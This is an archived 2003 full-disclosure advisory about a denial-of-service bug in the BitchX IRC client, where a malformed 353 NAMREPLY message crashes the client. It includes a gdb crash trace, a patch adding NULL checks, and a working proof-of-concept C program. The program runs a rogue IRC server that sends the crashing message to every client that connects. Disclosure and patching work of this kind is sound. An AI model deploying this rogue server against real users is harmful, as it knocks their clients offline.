OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
argv_at_hushmail.com
Date: Sun Feb 16 2003 - 22:39:52 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----

    Mon Feb 17 15:26:06 EST 2003

    1. Topic:
            BitchX IRC Client

    2. Relevant versions:
            Vulnerable:
                    BitchX-75p3
                    BitchX-1.0c16
                    BitchX-1.0c19
                    BitchX-1.0c20cvs
            Not Vulnerable:
                    BitchX-1.0c18

    3. Problem description:
            A denial of service vulnerability exists in BitchX. Sending
            a malformed RPL_NAMREPLY numeric 353 causes BitchX to segfault.
            This problem was reported to panasyncefnet#bitchx on
            Jan 30 2003, as of this writing we are unaware of any patches
            or workarounds provided by panasync and or any members of
            #bitchx

    4. Workaround:
            Patch Included
            Use epic, ircII

    5. References:
            http://www.bitchx.org
            http://www.epicsol.org
            http://www.ircii.org

    6. Contact:
            argvhushmail.com

    - -----begin gdb.output-----
    argvblack:~/BitchX_353/BitchX/source$ gdb ./BitchX
    Reading symbols from ./BitchX...done.
    (gdb) r argv.matrux.net
    Starting program: /home/argv/BitchX_353/BitchX/source/./BitchX argv.matrux.net
    BitchX - Based on EPIC Software Labs epic ircII (1998).
    Version (BitchX-1.0c20cvs) -- Date (20020325).
    Process [30890]
    Program received signal SIGSEGV, Segmentation fault.
    0x80bcdff in funny_namreply ()
    (gdb) info reg
    eax 0x0 0
    ecx 0xbfffcf34 -1073754316
    edx 0x0 0
    ebx 0xbfffcf2c -1073754324
    esp 0xbfffcc94 0xbfffcc94
    ebp 0xbfffd7b5 0xbfffd7b5
    esi 0xbfffd7b8 -1073752136
    edi 0x0 0
    eip 0x80bcdff 0x80bcdff
    eflags 0x10282 66178
    cs 0x23 35
    ss 0x2b 43
    ds 0x2b 43
    es 0x2b 43
    fs 0x0 0
    gs 0x0 0
    fctrl 0x37f 895
    fstat 0x20 32
    ftag 0xffff 65535
    fiseg 0x23 35
    fioff 0x80d1c7c 135076988
    foseg 0x2b 43
    fooff 0xbfffe130 -1073749712
    fop 0x0 0
    (gdb) disass $eip-0x20 $eip+0x20Dump of assembler code from 0x80bcddf to 0x80bce1f:
    0x80bcddf <funny_namreply+19>: sbb $0x0,%al
    0x80bcde1 <funny_namreply+21>: add %al,(%eax)
    0x80bcde3 <funny_namreply+23>: add %al,0x26af8c4(%ebx)
    0x80bcde9 <funny_namreply+29>: push %ebx
    0x80bcdea <funny_namreply+30>: mov 0x318(%eax),%eax
    0x80bcdf0 <funny_namreply+36>: call *%eax
    0x80bcdf2 <funny_namreply+38>: mov (%ebx),%ebp
    0x80bcdf4 <funny_namreply+40>: mov 0x4(%ebx),%esi
    0x80bcdf7 <funny_namreply+43>: mov 0x8(%ebx),%edi
    0x80bcdfa <funny_namreply+46>: mov %edi,%edx
    0x80bcdfc <funny_namreply+48>: add $0x10,%esp
    0x80bcdff <funny_namreply+51>: cmpb $0x0,(%edi)
    0x80bce02 <funny_namreply+54>: je 0x80bce2f <funny_namreply+99>
    0x80bce04 <funny_namreply+56>: mov 0x1c(%esp,1),%ecx
    0x80bce08 <funny_namreply+60>: inc %ecx
    0x80bce09 <funny_namreply+61>: cmpb $0x20,(%edx)
    0x80bce0c <funny_namreply+64>: je 0x80bce1b <funny_namreply+79>
    0x80bce0e <funny_namreply+66>: mov %esi,%esi
    0x80bce10 <funny_namreply+68>: inc %edx
    0x80bce11 <funny_namreply+69>: mov (%edx),%al
    0x80bce13 <funny_namreply+71>: test %al,%al
    0x80bce15 <funny_namreply+73>: je 0x80bce1b <funny_namreply+79>
    0x80bce17 <funny_namreply+75>: cmp $0x20,%al
    0x80bce19 <funny_namreply+77>: jne 0x80bce10 <funny_namreply+68>
    0x80bce1b <funny_namreply+79>: mov %ecx,0x1c(%esp,1)
    End of assembler dump.
    - -----end gdb.output-----

    - -----begin BitchX-1.0c20cvs-353.diff-----
    diff -Nru BitchX.orig/source/funny.c BitchX/source/funny.c
    - --- BitchX.orig/source/funny.c Sun Feb 16 18:34:16 2003
    +++ BitchX/source/funny.c Sun Feb 16 18:39:56 2003
    -260,7 +260,10
            type = Args[0];
            channel = Args[1];
            line = Args[2];
    - -
    + if (channel == NULL || line == NULL) {
    + bitchsay("Invalid number of arguments for %s", __FUNCTION__);
    + return;
    + }
            ptr = line;
            while (*ptr)
            {
    - -----end BitchX-1.0c20cvs-353.diff-----

    - -----begin bitchx-353.c-----
    /*
     * bitchx-353.c
     * --argv
     * Jan/30/03
     *
     * Vulnerable:
     * BitchX-75p3
     * BitchX-1.0c16
     * BitchX-1.0c19
     * BitchX-1.0c20cvs
     *
     * Not Vulnerable:
     * BitchX-1.0c18 (So far..)
     *
     *
     * Workaround:
     * in function funny_namreply()
     * after the PasteArgs(Args, 2);
     * add in
     * -- snip --
     * if (Args[1] == NULL || Args[2] == NULL)
     * return;
     * -- unsnip --
     *
     * ---- the vuln code of bx -----
     * PasteArgs(Args, 2);
     * type = Args[0];
     * channel = Args[1];
     * line = Args[2];
     *
     * ptr = line;
     * while (*ptr)
     * {
     * while (*ptr && (*ptr != ' '))
     * ptr++;
     * user_count++;
     * while (*ptr && (*ptr == ' '))
     * ptr++;
     * }
     * ------------------------------
     *
     * [panasync(panasynccolossus.melnibone.org)] you would hope the irc server would be a trusted source.
     * [hellman(hellmanipv6.gi-1.au.reroute.se)] 'Free porn at /server irc.owned.com'
     *
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>

    static char shellcode[] = ":* 353 * = :\n"; // <-- this could be something worse.

    int acceptConnection(int fd)
    {
       char *ip_addr;
       int descriptor, sal;
       struct sockaddr_in sa;
       sal = sizeof(sa);
       descriptor = accept(fd, (struct sockaddr *) &sa, &sal);
       if (descriptor >= 0) {
          ip_addr = inet_ntoa(sa.sin_addr);
          printf("Connection from %s:%d\n", ip_addr, ntohs(sa.sin_port));
       }
       return descriptor;
    }

    int main(int argc, char **argv)
    {
       int sock, serv, port;
       struct sockaddr_in server;

       port = 6667;

       if (argc > 1)
            port = atoi(argv[1]);

       memset(&server, 0, sizeof(server));
       server.sin_port = htons(port);
       server.sin_family = AF_INET;
       server.sin_addr.s_addr = INADDR_ANY;

       sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
       setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &serv, sizeof(int));

       if (bind(sock, (struct sockaddr *) &server, sizeof(struct sockaddr_in))
           == -1) {
          return 0;
       }

       listen(sock, 1);

       while (1) {
          serv = acceptConnection(sock);
          write(serv, shellcode, strlen(shellcode));
          close(serv);
       }
       return 0;
    }
    - -----end bitchx-353.c-----

    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.2 (Java)
    Note: This signature can be verified at https://www.hushtools.com/verify

    wlkEARECABkFAj5QZQcSHGFyZ3ZAaHVzaG1haWwuY29tAAoJEO/BXrpp9BkpPtwAn0ty
    A6Vhvj6/RKsLKAjqfGZPdWVnAKCQd8a31hr7pdKMHIyerDZ86s8xGA==
    =yF3L
    -----END PGP SIGNATURE-----

    Concerned about your privacy? Follow this link to get
    FREE encrypted email: https://www.hushmail.com/?l=2

    Big $$$ to be made with the HushMail Affiliate Program:
    https://www.hushmail.com/about.php?subloc=affiliate&l=427
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html